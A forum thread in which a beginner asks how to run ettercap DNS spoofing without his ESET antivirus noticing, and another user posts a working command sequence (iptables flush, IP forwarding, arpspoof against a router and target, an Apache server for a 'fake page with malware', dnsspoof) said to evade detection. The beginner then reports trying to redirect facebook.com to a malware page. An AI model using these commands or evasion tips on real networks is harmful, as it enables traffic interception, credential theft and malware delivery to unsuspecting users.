Dns spoofing with ettercap without alerting antivirus

[thehobit]

hey guys i wanted to do some dns spoofing using ettercap. I used this command ettercap -Tqi eth0 -P dns_spoof -M ARP // // But as soon as i give this command my eset antivirus detects it and blocks it. But ass soon as i turn off the antivirus i am able to do the spoofing without any issues. So what i wanted to ask is that is there a way i can dns spoof without alerting my antivirus. I am new but willing to learn

Thanks in advance ,
thehobit.

[zimmaro]

hey guys i wanted to do some dns spoofing using ettercap. I used this command ettercap -Tqi eth0 -P dns_spoof -M ARP // // But as soon as i give this command my eset antivirus detects it and blocks it. But ass soon as i turn off the antivirus i am able to do the spoofing without any issues. So what i wanted to ask is that is there a way i can dns spoof without alerting my antivirus. I am new but willing to learn

Thanks in advance ,
thehobit.

hi thehobit
I'm no expert
but you have some specific settings of the AV?
because my eset (setup-heuristic) is not blocked the spoofing in my "virtual-net"?
I only have a notice of "any security of my win7 (fully-update") of unknown origin "file-download" (if the "spooffing-redirection" contains a "file" & i press download!)
I made a proof with ettercap only for "ARP" & dnsspoof for"spoofing-dns" & my eset don't BLOCK-redirection.....
http://imageshack.us/f/7/spoof1.png/
http://imageshack.us/f/28/spoof2.png/
http://imageshack.us/f/13/spoof3.png/

[thehobit]

@zimmaro thats because you have nod 32 installed on your computer and i have smart security with has an advanced firewall

[zimmaro]

@zimmaro thats because you have nod 32 installed on your computer and i have smart security with has an advanced firewall

@thehobit

i've installed now esmart-security V6 fully enable!!! in win 7 fully-patched
OK! standart ARPING is BLOCKING with a ""famous-pop-up of eset"....but.....
i made a """""arping-reverse""""" & it's not detected!

root@bt:~# iptables --flush #
root@bt:~# iptables --table nat --flush #CLEAN my "iptables
root@bt:~# iptables --delete-chain #
root@bt:~# iptables --table nat --delete-chain #
root@bt:~# echo '1' > /proc/sys/net/ipv4/ip_forward
root@bt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.6 ####/router/ /target-win7-with-eset/####
root@bt:~# /etc/init.d/apache2 start #####locate fake page with malware###
root@bt:~# dnsspoof -i eth0 ###spoof lan############

http://imageshack.us/f/707/screenshotrph.png/
bye

[thehobit]

i dont understand these steps
root@bt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.6 ####/router/ /target-win7-with-eset/####
root@bt:~# /etc/init.d/apache2 start #####locate fake page with malware###
root@bt:~# dnsspoof -i eth0 ###spoof lan############

Can u plz provide a screenshot of u using all those commands on ur backtrack terminal
also should i type these commands just like mentioned above plz help

[thehobit]

ok thank you i was able to do the attack on a virtual machine running xp sp 2 and avg internet security running without any problems. In my windows 7 eset does not detect the arp poisoning or the dns spoofing but when i go to facebook.com i am not redirected to the fake site with malware. Why is this so?

[sickness]

Clearly you are not familiar with the way this attack works or what might be triggering your AV. I recommend you document yourself on this matter before proceeding.